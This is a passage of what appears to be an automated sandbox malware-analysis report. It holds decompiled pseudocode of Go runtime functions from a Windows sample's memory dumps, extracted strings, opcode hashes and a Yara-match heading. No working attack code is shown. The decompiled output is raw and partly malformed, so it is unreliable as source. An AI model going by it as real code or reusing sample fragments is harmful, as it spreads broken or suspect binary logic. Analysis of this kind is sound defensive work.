                                                                                                                            											E01332C40(_t80, _t83, _t85, _t86, 0x1388606, _t116, _t149, _t167);
                                                                                                                            											E01332940(_t83, _t85, _t86, _v32, _t125, _t149, _t167);
                                                                                                                            											E01332C40(_t80, _t83, _t85, _t86, 0x138775c, _t116, _t149, _t167);
                                                                                                                            											E01332940(_t83, _t85, _t86, _a16, _t125, _t149, _t167);
                                                                                                                            											E013325A0(_t80, _t82, _t83, _t85, _t86, _t149, _t167);
                                                                                                                            											L013323C0(_t134, _t149, _t167);
                                                                                                                            											_v16 =  *((intOrPtr*)(_a8 + 0x10078));
                                                                                                                            											E01332340(_t134, _t149, _t167);
                                                                                                                            											E01332C40(_t80, _t83, _t85, _t86, 0x1389e03, _t116, _t149, _t167);
                                                                                                                            											__eflags = _v16 >> 0xd;
                                                                                                                            											E01332940(_t83, _t85, _t86, _v16 >> 0xd, _t125, _t149, _t167);
                                                                                                                            											E01332C40(_t80, _t83, _t85, _t86, 0x1388a21, _t116, _t149, _t167);
                                                                                                                            											L01332AA0(_t82, _t83, _t86, _v16, _t125, _t149, _t167);
                                                                                                                            											E013325A0(_t80, _t82, _t83, _t85, _t86, _t149, _t167);
                                                                                                                            											L013323C0(_t134, _t149, _t167);
                                                                                                                            											E01330BA0(0x1388850, _t116, _t149);
                                                                                                                            											goto L21;
                                                                                                                            										} else {
                                                                                                                            											L10:
                                                                                                                            											_t136 = _v16 << 0x16;
                                                                                                                            											_t145 = (_t102 << 0xd) + _t136 + 0;
                                                                                                                            											_t130 = _t136 + (_t116 << 0xd) + 0;
                                                                                                                            											L16:
                                                                                                                            											_v16 = _t145;
                                                                                                                            											_v24 = _t130;
                                                                                                                            											_t55 = E01324AC0(_t54, _t73, _t80, _t82, _t83, _a8, _t145, _a16, _t149, _t166, _t167, _t168);
                                                                                                                            											_t131 = _a8;
                                                                                                                            											_t161 = _v24;
                                                                                                                            											if(0 + _t161 >  *((intOrPtr*)(_t131 + 0x10078)) + 0) {
                                                                                                                            												 *((long long*)(_t131 + 0x10078)) = _t161;
                                                                                                                            											}
                                                                                                                            											return _t55;
                                                                                                                            										}
                                                                                                                            									}
                                                                                                                            								}
                                                                                                                            							}
                                                                                                                            						}
                                                                                                                            					}
                                                                                                                            					L24:
                                                                                                                            					L23:
                                                                                                                            					_a8 = _t97;
                                                                                                                            					_a16 = _t116;
                                                                                                                            					E0135A8C0(_t82, _t86, __eflags, _t116, _t123, _t143, _t149, _t158, _t163, _t164, _t165, _t166, _t168);
                                                                                                                            				}
                                                                                                                            			}









































                                                                                                                            0x01325e82
                                                                                                                            0x01325e93
                                                                                                                            0x01325ea0
                                                                                                                            0x01325eb1
                                                                                                                            0x01325ec0
                                                                                                                            0x01325ec5
                                                                                                                            0x01325eca
                                                                                                                            0x01325edb
                                                                                                                            0x01325ee0
                                                                                                                            0x01325ef1
                                                                                                                            0x01325f00
                                                                                                                            0x01325f04
                                                                                                                            0x01325f15
                                                                                                                            0x01325f20
                                                                                                                            0x01325f25
                                                                                                                            0x01325f2a
                                                                                                                            0x01325f40
                                                                                                                            0x00000000
                                                                                                                            0x01325daf
                                                                                                                            0x01325daf
                                                                                                                            0x01325db8
                                                                                                                            0x01325dca
                                                                                                                            0x01325dd4
                                                                                                                            0x01325e18
                                                                                                                            0x01325e18
                                                                                                                            0x01325e1d
                                                                                                                            0x01325e2f
                                                                                                                            0x01325e34
                                                                                                                            0x01325e4d
                                                                                                                            0x01325e58
                                                                                                                            0x01325e5a
                                                                                                                            0x01325e5a
                                                                                                                            0x01325e72
                                                                                                                            0x01325e72
                                                                                                                            0x01325da9
                                                                                                                            0x01325d77
                                                                                                                            0x01325d6a
                                                                                                                            0x01325d43
                                                                                                                            0x01325d2e
                                                                                                                            0x00000000
                                                                                                                            0x01325f5e
                                                                                                                            0x01325f5e
                                                                                                                            0x01325f63
                                                                                                                            0x01325f68
                                                                                                                            0x01325f72

                                                                                                                            Strings
                                                                                                                            • , npages = /dev/stderr/dev/stdout: frame.sp=CloseHandleCreateFileWDeleteFileWDives_AkuruExitProcessFreeLibraryGOTRACEBACKGetFileTypeIdeographicMedefaidrinMoveFileExWNandinagariNetShareAddNetShareDelNew_Tai_LueOld_PersianOld_SogdianOpenProcessPau_Cin_HauRegClos, xrefs: 01325EA5
                                                                                                                            • , p.searchAddr = : missing method DnsRecordListFreeFLE Standard TimeGC assist markingGMT Standard TimeGTB Standard TimeGetCurrentProcessGetShortPathNameWLookupAccountSidWOld_North_ArabianOld_South_ArabianOther_ID_ContinueRegLoadMUIStringWSentence_TerminalSyste, xrefs: 01325F09
                                                                                                                            • bad summary databad symbol tablecastogscanstatusgc: unswept spangcshrinkstackoffinteger overflowinvalid argumentinvalid exchangeinvalid g statusmSpanList.insertmSpanList.removemessage too longmissing stackmapnewmHandoff.lockno route to hostnon-Go functionobje, xrefs: 01325F2F
                                                                                                                            • runtime: max = runtime: min = runtimer: bad pscan missed a gstartm: m has pstopm holding p already; errno= mheap.sweepgen= not in ranges: untyped locals , not a function0123456789abcdefCreateDirectoryWDnsNameCompare_WDuplicateTokenExFlushFileBuffersGC scaveng, xrefs: 01325E87
                                                                                                                            • runtime: searchIdx = runtime: work.nwait= stale NFS file handlestartlockedm: m has pstartm: m is spinningstate not recoverabletimer data corruption/lib/time/zoneinfo.zipAleutian Standard TimeAtlantic Standard TimeCaucasus Standard TimeConvertSidToStringSidWCon, xrefs: 01325EE5
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.703513373.0000000001301000.00000020.00000001.01000000.00000004.sdmp, Offset: 01300000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_1300000_????????????.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • API String ID: 0-3280003337
                                                                                                                            • Opcode ID: 26622aed9197aa5101768b442896e11a3878e9660890fde9408d2a938f4529c8
                                                                                                                            • Instruction ID: cb0ce786f067c7fddb83f9a6899f071eb0f891e74fb8accbeb663af0f22ee438
                                                                                                                            • Opcode Fuzzy Hash: 26622aed9197aa5101768b442896e11a3878e9660890fde9408d2a938f4529c8
                                                                                                                            • Instruction Fuzzy Hash: DC51CF72724B9486DB10AB19E4403DEAB60F799BD8F584522DF9D03B69CF3CC685C700
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            C-Code - Quality: 80%
                                                                                                                            			E01351B00(intOrPtr __ebx, void* __edx, void* __edi, void* __esi, void* __esp, long long __rax, long long __rdx, void* __rdi, void* __rsi, long long __rbp, void* __r8, void* __r14, long long _a8, intOrPtr _a16) {
                                                                                                                            				char _v8;
                                                                                                                            				long long _v16;
                                                                                                                            				long long _v24;
                                                                                                                            				long long _v32;
                                                                                                                            				long long _v40;
                                                                                                                            				long long _v48;
                                                                                                                            				void* _t31;
                                                                                                                            				void* _t34;
                                                                                                                            				void* _t36;
                                                                                                                            				intOrPtr _t53;
                                                                                                                            				void* _t62;
                                                                                                                            				void* _t63;
                                                                                                                            				void* _t64;
                                                                                                                            				void* _t65;
                                                                                                                            				long long _t74;
                                                                                                                            				long long _t87;
                                                                                                                            				intOrPtr _t93;
                                                                                                                            				long long _t94;
                                                                                                                            				void* _t98;
                                                                                                                            				void* _t99;
                                                                                                                            				void* _t104;
                                                                                                                            				void* _t109;
                                                                                                                            				void* _t110;
                                                                                                                            
                                                                                                                            				L0:
                                                                                                                            				while(1) {
                                                                                                                            					L0:
                                                                                                                            					_t110 = __r14;
                                                                                                                            					_t109 = __r8;
                                                                                                                            					_t100 = __rbp;
                                                                                                                            					_t99 = __rsi;
                                                                                                                            					_t98 = __rdi;
                                                                                                                            					_t97 = __rdx;
                                                                                                                            					_t74 = __rax;
                                                                                                                            					_t65 = __esp;
                                                                                                                            					_t64 = __esi;
                                                                                                                            					_t63 = __edi;
                                                                                                                            					_t62 = __edx;
                                                                                                                            					_t53 = __ebx;
                                                                                                                            					if(_t104 <=  *((intOrPtr*)(__r14 + 0x10))) {
                                                                                                                            						goto L18;
                                                                                                                            					}
                                                                                                                            					L1:
                                                                                                                            					_v8 = __rbp;
                                                                                                                            					_t100 =  &_v8;
                                                                                                                            					if(__ebx == 0xffffffff) {
                                                                                                                            						L3:
                                                                                                                            						return _t31;
                                                                                                                            					} else {
                                                                                                                            						L2:
                                                                                                                            						_t94 = 0x146a760;
                                                                                                                            						L5:
                                                                                                                            						while(_t94 != 0) {
                                                                                                                            							if( *((intOrPtr*)(_t94 + 0x118)) > _t74 ||  *((intOrPtr*)(_t94 + 0x120)) <= _t74) {
                                                                                                                            								L4:
                                                                                                                            								_t94 =  *((intOrPtr*)(_t94 + 0x220));
                                                                                                                            								continue;
                                                                                                                            							}
                                                                                                                            							L10:
                                                                                                                            							if(_t94 != 0) {
                                                                                                                            								L14:
                                                                                                                            								return E01347A60(_t53, _t62, _t63, _t64, _t65, _t94, _t94, _t100, _t109, _t110);
                                                                                                                            							} else {
                                                                                                                            								L11:
                                                                                                                            								_v48 = _t74;
                                                                                                                            								_a16 = _t53;
                                                                                                                            								0;
                                                                                                                            								_t34 = E01309600(0x147b660, _t97, _t100, _t110);
                                                                                                                            								_t93 =  *0x147b670; // 0x0
                                                                                                                            								_t61 = _a16;
                                                                                                                            								L0130D720(_t34, _a16, 0x137afc0, _t93, _t98, _t99, _t100, _t109, _t110);
                                                                                                                            								_t95 =  *0x137afc0;
                                                                                                                            								_v24 =  *0x137afc0;
                                                                                                                            								_t36 = E01309820(0x147b660, _t100, _t110);
                                                                                                                            								if(_v24 != 0) {
                                                                                                                            									L13:
                                                                                                                            									return _t36;
                                                                                                                            								} else {
                                                                                                                            									L12:
                                                                                                                            									E01332340(_t97, _t100, _t110);
                                                                                                                            									E01332C40(_t61, _t63, _t64, _t65, 0x1388c96, _t93, _t100, _t110);
                                                                                                                            									L01332AA0(_t62, _t63, _t65, _a16, _t95, _t100, _t110);
                                                                                                                            									E01332C40(_t61, _t63, _t64, _t65, 0x1386ba5, _t93, _t100, _t110);
                                                                                                                            									L01332AA0(_t62, _t63, _t65, _v48, _t95, _t100, _t110);
                                                                                                                            									E01332C40(_t61, _t63, _t64, _t65, 0x1388680, _t93, _t100, _t110);
                                                                                                                            									L013323C0(_t97, _t100, _t110);
                                                                                                                            									_t87 = 0x146a760;
                                                                                                                            									L16:
                                                                                                                            									while(_t87 != 0) {
                                                                                                                            										_v16 = _t87;
                                                                                                                            										_v32 =  *((intOrPtr*)(_t87 + 0x118));
                                                                                                                            										_t97 =  *((intOrPtr*)(_t87 + 0x120));
                                                                                                                            										_v40 =  *((intOrPtr*)(_t87 + 0x120));
                                                                                                                            										E01332340( *((intOrPtr*)(_t87 + 0x120)), _t100, _t110);
                                                                                                                            										E01332C40(_t61, _t63, _t64, _t65, 0x1386ea8, _t93, _t100, _t110);
                                                                                                                            										L01332AA0(_t62, _t63, _t65, _v32,  *((intOrPtr*)(_t87 + 0x118)), _t100, _t110);
                                                                                                                            										E01332C40(_t61, _t63, _t64, _t65, 0x1386f35, _t93, _t100, _t110);
                                                                                                                            										L01332AA0(_t62, _t63, _t65, _v40,  *((intOrPtr*)(_t87 + 0x118)), _t100, _t110);
                                                                                                                            										E013325A0(_t61, _t62, _t63, _t64, _t65, _t100, _t110);
                                                                                                                            										L013323C0( *((intOrPtr*)(_t87 + 0x120)), _t100, _t110);
                                                                                                                            										_t87 =  *((intOrPtr*)(_v16 + 0x220));
                                                                                                                            									}
                                                                                                                            									_t74 = 0x138e2a2;
                                                                                                                            									_t53 = 0x2e;
                                                                                                                            									E01330BA0(0x138e2a2, _t93, _t100);
                                                                                                                            									goto L18;
                                                                                                                            								}
                                                                                                                            							}
                                                                                                                            							goto L19;
                                                                                                                            						}
                                                                                                                            						goto L10;
                                                                                                                            					}
                                                                                                                            					L19:
                                                                                                                            					L18:
                                                                                                                            					_a8 = _t74;
                                                                                                                            					_a16 = _t53;
                                                                                                                            					E01356200(_t97, _t100);
                                                                                                                            				}
                                                                                                                            			}


                                                                                                                            Strings
                                                                                                                            • base code= ctxt: curg= free goid jobs= list= m->p= max= min= next= p->m= prev= span=% util(...), i = , not <-chanArabicBrahmiCarianChakmaCommonCopticGOROOTGetACPGothicHangulHatranHebrewHyphenKaithiKhojkiLepchaLycianLydianRejangSCHED SyriacTai_LeTangutTe, xrefs: 01351BE5
                                                                                                                            • runtime: textOff runtime: typeOff scanobject n == 0select (no cases)stack: frame={sp:swept cached spanthread exhaustionunknown caller pcwait for GC cyclewrong medium type but memory size because dotdotdot in async preempt to non-Go memory , locked to thread, xrefs: 01351BC5
                                                                                                                            • types value=connectconsolecpuproffloat32float64forcegcgctracehead = invalidminpc= pacer: panic: runningsyscalluintptrunknownwaiting bytes, etypes is not maxpc= mcount= minLC= minutes nalloc= newval= nfreed= packed= pointer stack=[ status AcceptExArmenia, xrefs: 01351C65
                                                                                                                            • not in ranges: untyped locals , not a function0123456789abcdefCreateDirectoryWDnsNameCompare_WDuplicateTokenExFlushFileBuffersGC scavenge waitGC worker (idle)GODEBUG: value "GetComputerNameWGetCurrentThreadGetFullPathNameWGetLongPathNameWImperial_AramaicMero, xrefs: 01351C05
                                                                                                                            • runtime: text offset base pointer out of rangeruntime: type offset base pointer out of rangesignal arrived during external code executionslice bounds out of range [:%x] with length %ystopTheWorld: not stopped (status != _Pgcstop)sysGrow bounds not aligned to , xrefs: 01351CC9
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.703513373.0000000001301000.00000020.00000001.01000000.00000004.sdmp, Offset: 01300000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_1300000_????????????.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: types value=connectconsolecpuproffloat32float64forcegcgctracehead = invalidminpc= pacer: panic: runningsyscalluintptrunknownwaiting bytes, etypes is not maxpc= mcount= minLC= minutes nalloc= newval= nfreed= packed= pointer stack=[ status AcceptExArmenia$ base code= ctxt: curg= free goid jobs= list= m->p= max= min= next= p->m= prev= span=% util(...), i = , not <-chanArabicBrahmiCarianChakmaCommonCopticGOROOTGetACPGothicHangulHatranHebrewHyphenKaithiKhojkiLepchaLycianLydianRejangSCHED SyriacTai_LeTangutTe$ not in ranges: untyped locals , not a function0123456789abcdefCreateDirectoryWDnsNameCompare_WDuplicateTokenExFlushFileBuffersGC scavenge waitGC worker (idle)GODEBUG: value "GetComputerNameWGetCurrentThreadGetFullPathNameWGetLongPathNameWImperial_AramaicMero$runtime: text offset base pointer out of rangeruntime: type offset base pointer out of rangesignal arrived during external code executionslice bounds out of range [:%x] with length %ystopTheWorld: not stopped (status != _Pgcstop)sysGrow bounds not aligned to $runtime: textOff runtime: typeOff scanobject n == 0select (no cases)stack: frame={sp:swept cached spanthread exhaustionunknown caller pcwait for GC cyclewrong medium type but memory size because dotdotdot in async preempt to non-Go memory , locked to thread
                                                                                                                            • API String ID: 0-2259351158
                                                                                                                            • Opcode ID: 939e3ed2f2ae1029682204e649d34b6957420f6e18e510e1a43cc452175afd04
                                                                                                                            • Instruction ID: 42ea8fd6a1c94064d04efc1b30258ca6edb5106e25186cf5a6146b3fa96091b5
                                                                                                                            • Opcode Fuzzy Hash: 939e3ed2f2ae1029682204e649d34b6957420f6e18e510e1a43cc452175afd04
                                                                                                                            • Instruction Fuzzy Hash: 70416932205B84CADB54AF58E4807AEBBA4F79AB98F845021EA8E03771DF38C545CB05
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            C-Code - Quality: 76%
                                                                                                                            			E01350C40(void* __ecx, void* __edx, void* __edi, void* __esi, void* __esp, long long __rax, long long __rbx, long long __rcx, long long __rdi, long long __rbp, void* __r10, void* __r11, void* __r14, long long _a8, long long _a16, long long _a24, long long _a32) {
                                                                                                                            				char _v8;
                                                                                                                            				long long _v16;
                                                                                                                            				long long _v24;
                                                                                                                            				char _v32;
                                                                                                                            				long long _v40;
                                                                                                                            				long long _v48;
                                                                                                                            				long long _v56;
                                                                                                                            				long long _v64;
                                                                                                                            				long long _v72;
                                                                                                                            				long long _v80;
                                                                                                                            				void* _t59;
                                                                                                                            				void* _t60;
                                                                                                                            				void* _t61;
                                                                                                                            				void* _t62;
                                                                                                                            				void* _t63;
                                                                                                                            				long long _t67;
                                                                                                                            				void* _t73;
                                                                                                                            				void* _t90;
                                                                                                                            				intOrPtr _t99;
                                                                                                                            				intOrPtr _t102;
                                                                                                                            				void* _t104;
                                                                                                                            				long long _t105;
                                                                                                                            				long long _t110;
                                                                                                                            				char* _t112;
                                                                                                                            				void* _t114;
                                                                                                                            				long long _t117;
                                                                                                                            				void* _t118;
                                                                                                                            				void* _t119;
                                                                                                                            				void* _t120;
                                                                                                                            
                                                                                                                            				L0:
                                                                                                                            				while(1) {
                                                                                                                            					L0:
                                                                                                                            					_t120 = __r14;
                                                                                                                            					_t119 = __r11;
                                                                                                                            					_t118 = __r10;
                                                                                                                            					_t108 = __rdi;
                                                                                                                            					_t97 = __rcx;
                                                                                                                            					_t92 = __rbx;
                                                                                                                            					_t74 = __rax;
                                                                                                                            					_t63 = __esp;
                                                                                                                            					_t62 = __esi;
                                                                                                                            					_t61 = __edi;
                                                                                                                            					_t60 = __edx;
                                                                                                                            					_t59 = __ecx;
                                                                                                                            					if(_t114 >  *((intOrPtr*)(__r14 + 0x10))) {
                                                                                                                            						break;
                                                                                                                            					}
                                                                                                                            					L10:
                                                                                                                            					_a8 = __rax;
                                                                                                                            					_a16 = __rbx;
                                                                                                                            					_a24 = __rcx;
                                                                                                                            					_a32 = __rdi;
                                                                                                                            					E01356200(_t104, __rbp);
                                                                                                                            				}
                                                                                                                            				L1:
                                                                                                                            				_v8 = __rbp;
                                                                                                                            				_t112 =  &_v8;
                                                                                                                            				_t105 =  *((intOrPtr*)(__rcx + 0x28));
                                                                                                                            				_t110 =  *((intOrPtr*)(__rcx + 0x30));
                                                                                                                            				if(_t110 == 0) {
                                                                                                                            					L5:
                                                                                                                            					_t117 = _t105;
                                                                                                                            				} else {
                                                                                                                            					if(_t110 >= _t105) {
                                                                                                                            						goto L5;
                                                                                                                            					} else {
                                                                                                                            						_t67 = _t110;
                                                                                                                            						_t117 = _t105;
                                                                                                                            						_t105 = _t110;
                                                                                                                            					}
                                                                                                                            				}
                                                                                                                            				_v40 = _t117;
                                                                                                                            				_v48 = _t110;
                                                                                                                            				_v56 = _t74;
                                                                                                                            				_v64 = _t92;
                                                                                                                            				_a32 = _t108;
                                                                                                                            				_a24 = _t97;
                                                                                                                            				_v80 = _t105;
                                                                                                                            				if(_t67 != 0 && _t110 > _t117) {
                                                                                                                            					_t117 = _t110;
                                                                                                                            				}
                                                                                                                            				_v72 = _t117;
                                                                                                                            				E01332340(_t105, _t112, _t120);
                                                                                                                            				E01332C40(_t59, _t61, _t62, _t63, 0x1388cda, _t92, _t112, _t120);
                                                                                                                            				L01332AA0(_t60, _t61, _t63, _v40, _t97, _t112, _t120);
                                                                                                                            				E01332C40(_t59, _t61, _t62, _t63, 0x1386a9d, _t92, _t112, _t120);
                                                                                                                            				L01332AA0(_t60, _t61, _t63, _v48, _t97, _t112, _t120);
                                                                                                                            				E01332C40(_t59, _t61, _t62, _t63, 0x13873ef, _t92, _t112, _t120);
                                                                                                                            				L01332AA0(_t60, _t61, _t63, _v56, _t97, _t112, _t120);
                                                                                                                            				E01332C40(_t59, _t61, _t62, _t63,  &M0138678C, _t92, _t112, _t120);
                                                                                                                            				L01332AA0(_t60, _t61, _t63, _v64, _t97, _t112, _t120);
                                                                                                                            				E01332C40(_t59, _t61, _t62, _t63, 0x13867b1, _t92, _t112, _t120);
                                                                                                                            				L013323C0(_t105, _t112, _t120);
                                                                                                                            				asm("inc esp");
                                                                                                                            				_v16 = 0;
                                                                                                                            				_v32 = 0x1350e20;
                                                                                                                            				_v24 = _a24;
                                                                                                                            				_v16 = _a32;
                                                                                                                            				_t99 = _v40;
                                                                                                                            				_t90 =  >  ? _t99 - 0x800 : _v80 + 0xffffff00;
                                                                                                                            				_t95 =  <  ? _t99 + 0x800 : _v72 + 0x100;
                                                                                                                            				_t96 =  <  ? _v64 :  <  ? _t99 + 0x800 : _v72 + 0x100;
                                                                                                                            				_t102 = _v56;
                                                                                                                            				_t91 =  >  ? _t102 : _t90;
                                                                                                                            				_t73 =  >  ? _t102 : _t90;
                                                                                                                            				return L01332DA0(_t59, _t60, _t61, _t62, _t63,  >  ? _t102 : _t90,  <  ? _v64 :  <  ? _t99 + 0x800 : _v72 + 0x100,  &_v32, _v72, _t112, _t118, _t119, _t120);
                                                                                                                            			}

































                                                                                                                            Strings
                                                                                                                            • } stack=[ MB goal, flushGen gfreecnt= pages at ptrSize= runqsize= runqueue= s.base()= spinning= stopwait= sweepgen sweepgen= targetpc= throwing= until pc=, bound = , limit = /dev/stdinBad varintCancelIoExChorasmianCreatePipeDeprecatedDevanagariDnsQuery_WE, xrefs: 01350CEF
                                                                                                                            • ), ->: > CcCfCoCsLlLmLoLtLuMcMeMnNdNlNoPcPdPePfPiPoPsScSkSmSoYiZlZpZs")" ][]i)msnss us} G M P ) *( - < > m= n=%: +00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...???ADTASTBSTCATCDTCETCSTEATEDTEETEOFESTGMTHDTHSTHanIDTISTJ, xrefs: 01350D2F
                                                                                                                            • ,-./0:<=?CLMPSZ[\, xrefs: 01350D0F
                                                                                                                            • , fp:-0930AdlamBamumBatakBuhidDograGreekKhmerLatinLimbuNushuOghamOriyaOsageRunicSTermTakriTamil] = (arrayclosedeferfalsefaultgFreegcinggscanhchaninit int16int32int64mheapntohspanicscav schedsleepslicesse41sse42ssse3sudogsweeptraceuint8usage B -> Value addr= a, xrefs: 01350CD3
                                                                                                                            • stack: frame={sp:swept cached spanthread exhaustionunknown caller pcwait for GC cyclewrong medium type but memory size because dotdotdot in async preempt to non-Go memory , locked to threadArab Standard TimeCaucasian_AlbanianCommandLineToArgvWCreateFileMapp, xrefs: 01350CB8
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.703513373.0000000001301000.00000020.00000001.01000000.00000004.sdmp, Offset: 01300000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_1300000_????????????.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: ), ->: > CcCfCoCsLlLmLoLtLuMcMeMnNdNlNoPcPdPePfPiPoPsScSkSmSoYiZlZpZs")" ][]i)msnss us} G M P ) *( - < > m= n=%: +00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...???ADTASTBSTCATCDTCETCSTEATEDTEETEOFESTGMTHDTHSTHanIDTISTJ$, fp:-0930AdlamBamumBatakBuhidDograGreekKhmerLatinLimbuNushuOghamOriyaOsageRunicSTermTakriTamil] = (arrayclosedeferfalsefaultgFreegcinggscanhchaninit int16int32int64mheapntohspanicscav schedsleepslicesse41sse42ssse3sudogsweeptraceuint8usage B -> Value addr= a$,-./0:<=?CLMPSZ[\$stack: frame={sp:swept cached spanthread exhaustionunknown caller pcwait for GC cyclewrong medium type but memory size because dotdotdot in async preempt to non-Go memory , locked to threadArab Standard TimeCaucasian_AlbanianCommandLineToArgvWCreateFileMapp$} stack=[ MB goal, flushGen gfreecnt= pages at ptrSize= runqsize= runqueue= s.base()= spinning= stopwait= sweepgen sweepgen= targetpc= throwing= until pc=, bound = , limit = /dev/stdinBad varintCancelIoExChorasmianCreatePipeDeprecatedDevanagariDnsQuery_WE
                                                                                                                            • API String ID: 0-41244472
                                                                                                                            • Opcode ID: 060ad3147a2240e40cde10feab9358c4bd2f525246c3ec4cb62b3b8c290eac28
                                                                                                                            • Instruction ID: fe00fb3ab38431efb07c4ec003923dc0820e7b084a70a7674adea3d637c05583
                                                                                                                            • Opcode Fuzzy Hash: 060ad3147a2240e40cde10feab9358c4bd2f525246c3ec4cb62b3b8c290eac28
                                                                                                                            • Instruction Fuzzy Hash: 5B415B72218F8482DB64DB09F88039BB764F799B88F504125EECE47B29DF38C5558B40
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708528999.0000025BF8AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8AB0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8ab0000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _errnomalloc$_callnewh$AllocateHeap_invalid_parameter_noinfo_snprintf
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3487649172-0
                                                                                                                            • Opcode ID: b4f2f3c2e1c11e2decf4288cd6928d8ca2bbb472ec1e89898e9bf29564b3272e
                                                                                                                            • Instruction ID: 5efbc6e64767569d3f7e39274f314f6b0261c855ea04a014724431e45d439038
                                                                                                                            • Opcode Fuzzy Hash: b4f2f3c2e1c11e2decf4288cd6928d8ca2bbb472ec1e89898e9bf29564b3272e
                                                                                                                            • Instruction Fuzzy Hash: E4117F31A1CF044FEB99EF6CA84A3A576D1EB89321F24455EF04AC3296DB34D84147D9
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            C-Code - Quality: 78%
                                                                                                                            			E013093A0(signed int __ecx, signed int __rbx, long long __rbp, void* __r14, long long _a8, signed long long _a16) {
                                                                                                                            				char _v8;
                                                                                                                            				long long _v16;
                                                                                                                            				signed long long _v24;
                                                                                                                            				signed long long _v32;
                                                                                                                            				signed long long _v40;
                                                                                                                            				void* _t21;
                                                                                                                            				signed int _t35;
                                                                                                                            				signed int _t42;
                                                                                                                            				void* _t43;
                                                                                                                            				void* _t44;
                                                                                                                            				void* _t45;
                                                                                                                            				void* _t46;
                                                                                                                            				long long _t49;
                                                                                                                            				signed long long _t63;
                                                                                                                            				signed long long _t67;
                                                                                                                            				signed long long _t68;
                                                                                                                            				void* _t70;
                                                                                                                            				signed long long _t71;
                                                                                                                            				long long _t72;
                                                                                                                            				void* _t75;
                                                                                                                            
                                                                                                                            				L0:
                                                                                                                            				while(1) {
                                                                                                                            					L0:
                                                                                                                            					_t78 = __r14;
                                                                                                                            					_t73 = __rbp;
                                                                                                                            					_t60 = __rbx;
                                                                                                                            					if(_t75 <=  *((intOrPtr*)(__r14 + 0x10))) {
                                                                                                                            						goto L7;
                                                                                                                            					}
                                                                                                                            					L1:
                                                                                                                            					_v8 = __rbp;
                                                                                                                            					_t73 =  &_v8;
                                                                                                                            					_t67 =  *(__rbx + 8) + 1;
                                                                                                                            					 *(__rbx + 8) = _t67;
                                                                                                                            					_t69 = __rbx;
                                                                                                                            					_t71 = _t67;
                                                                                                                            					_t42 = __ecx & 0x0007ffff;
                                                                                                                            					_t63 = __rbx << 0x00000010 | _t67;
                                                                                                                            					_t68 = _t63;
                                                                                                                            					_t60 = _t63 >> 0x13 << 3;
                                                                                                                            					if(__rbx == _t60) {
                                                                                                                            						goto L4;
                                                                                                                            					} else {
                                                                                                                            						L2:
                                                                                                                            						L6:
                                                                                                                            						_v32 = _t71;
                                                                                                                            						_v16 = __rbx;
                                                                                                                            						_v40 = _t68;
                                                                                                                            						_v24 = _t60;
                                                                                                                            						E01332340(__rbx,  &_v8, __r14);
                                                                                                                            						E01332C40(_t42, _t44, _t45, _t46, 0x138df70, _t60,  &_v8, __r14);
                                                                                                                            						E01332BC0(_t42, _t44, _t45, _t46, _v16, _t70,  &_v8, __r14);
                                                                                                                            						E01332C40(_t42, _t44, _t45, _t46, 0x1386a52, _t60, _t73, _t78);
                                                                                                                            						L01332AA0(_t43, _t44, _t46, _v32, _t68, _t73, _t78);
                                                                                                                            						E01332C40(_t42, _t44, _t45, _t46, 0x1386f7d, _t60, _t73, _t78);
                                                                                                                            						L01332AA0(_t43, _t44, _t46, _v40, _t68, _t73, _t78);
                                                                                                                            						E01332C40(_t42, _t44, _t45, _t46, 0x13871a6, _t60, _t73, _t78);
                                                                                                                            						E01332BC0(_t42, _t44, _t45, _t46, _v24, _t70, _t73, _t78);
                                                                                                                            						E013325A0(_t42, _t43, _t44, _t45, _t46, _t73, _t78);
                                                                                                                            						L013323C0(_t69, _t73, _t78);
                                                                                                                            						_t49 = 0x1387cf8;
                                                                                                                            						E01330BA0(0x1387cf8, _t60, _t73);
                                                                                                                            						goto L7;
                                                                                                                            					}
                                                                                                                            					while(1) {
                                                                                                                            						L4:
                                                                                                                            						 *_t69 =  *_t49;
                                                                                                                            						_t72 = _t49;
                                                                                                                            						asm("lock dec eax");
                                                                                                                            						_t35 = _t35 & 0xffffff00 | __eflags == 0x00000000;
                                                                                                                            						__eflags = _t35;
                                                                                                                            						if(__eflags != 0) {
                                                                                                                            							break;
                                                                                                                            						}
                                                                                                                            						L3:
                                                                                                                            						_t49 = _t72;
                                                                                                                            					}
                                                                                                                            					L5:
                                                                                                                            					return _t21;
                                                                                                                            					L8:
                                                                                                                            					goto L4;
                                                                                                                            					L7:
                                                                                                                            					_a8 = _t49;
                                                                                                                            					_a16 = _t60;
                                                                                                                            					E01356200(_t69, _t73);
                                                                                                                            				}
                                                                                                                            			}
























                                                                                                                            Strings
